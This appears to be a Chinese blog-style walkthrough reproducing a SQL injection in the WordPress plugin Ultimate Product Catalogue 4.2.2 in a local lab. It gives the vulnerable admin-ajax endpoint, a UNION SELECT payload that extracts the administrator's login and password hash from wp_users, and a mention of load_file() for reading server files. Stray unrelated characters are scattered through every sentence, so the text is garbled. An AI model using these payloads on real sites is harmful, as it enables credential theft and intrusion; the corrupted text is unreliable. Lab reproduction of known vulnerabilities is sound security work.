該SQL漏洞存在于wordpress的插件Ultimate Produce Catalogue 4.2.2版本,在Exploit Database可以搜到這個漏洞的信息:https://www.exploit-db.com/exploits/42263/。
01.基礎(chǔ)環(huán)境
1. WordPress _v4.6源碼驼壶,安裝Ultimate Produce Catalogue 4.2.2版本插件收苏。
2. 本機電腦搭建phpstudy作為WEB環(huán)境亿卤。
02.源碼部署
首先wordpress的安裝,這個之前在我已經(jīng)有詳細(xì)的搭建過程鹿霸,有不明白的小伙伴可以查看排吴。
下面介紹插件安裝,Ultimate Produce Catalogue插件安裝包的下載地址:
鏈接:http://pan.baidu.com/s/1o8Rvdfs
密碼:avul
安裝完成懦鼠,啟用插件钻哩。
03.漏洞復(fù)現(xiàn)過程
首先我們使用管理賬號新建一個賬號屹堰,名為testsql,利用testsql這個賬號通過sql注入漏洞拿到管理員的賬號街氢。
然后使用testsql這個賬號進行登陸扯键。
存在漏洞的地址如下:
http://127.0.0.1/wordpress/wp-admin/admin-ajax.php?action=get_upcp_subcategories
[請求數(shù)據(jù)]
CatID=0UNION SELECT 1,2
引起這個漏洞的原因是CatID的參數(shù)沒有做轉(zhuǎn)義處理導(dǎo)致sql注入,如下圖珊肃,可執(zhí)行sql語句荣刑。
下載之后,進入首頁近范,選擇插件嘶摊,添加插件并安裝。
管理員管理員賬號和密碼的sql語句:
Payload:
CatID=0 UNION SELECT user_login,user_pass FROM wp_users WHERE ID=1
04.總結(jié)
這個漏洞有點雞肋评矩,首先必須使用存在的賬號登陸才能夠回顯數(shù)據(jù)叶堆,接著獲得admin的賬號密碼之后,密碼的破解難度很大斥杜,我們可以使用load_file()去讀取系統(tǒng)的文件虱颗,如下是讀取數(shù)據(jù)庫的配置文件。
查看源代碼:
